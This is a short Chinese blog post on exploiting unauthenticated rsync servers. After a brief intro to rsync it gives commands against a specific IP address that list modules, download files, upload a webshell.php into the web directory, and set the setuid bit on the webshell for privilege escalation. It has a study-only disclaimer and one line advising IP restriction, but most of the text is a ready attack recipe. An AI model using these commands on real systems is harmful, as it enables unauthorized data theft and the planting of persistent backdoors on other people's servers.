记Rsync未授权利用

/ 实用技巧 / 0 条评论 / 2456 浏览

本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!!

前言

Rsync(remote synchronize)是一款实现远程同步功能的软件,它在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。

rsync是用 “rsync 算法”提供了一个客户机和远程文件服务器的文件同步的快速方法,而且可以通过ssh方式来传输文件,提高其保密性。

利用

rsync默认允许匿名访问,若未添加用户口令则可以进行匿名登录。 建议对rsync的IP访问进行限制以防止在用户口令被猜解或泄露时造成损失。

rsync 222.53.16.4.:: #列出同步目录
rsync 222.53.16.4::www/ #列出同步目录中的www目录
rsync -avz 222.53.16.4::www/test.php /root #下载文件到本地
rsync -avz 222.53.16.4::www/ /var/tmp #下载目录到本地
rsync -avz webshell.php 222.53.16.4::www/ #上传本地文件到rsync服务器

利用rsync提权

rsync进程默认以root权限启动,利用rsync同步文件的同时,可以保持原来文件的权限的特性,可以使用rsync进行提权。

chmod a+s webshell.php
rsync -avz webshell.php 222.53.16.4::www/

本文最后编辑时间为: 2019-10-10

如本文对你有帮助,点击下面广告支持一下吧,创作不易,感谢大佬。

safe6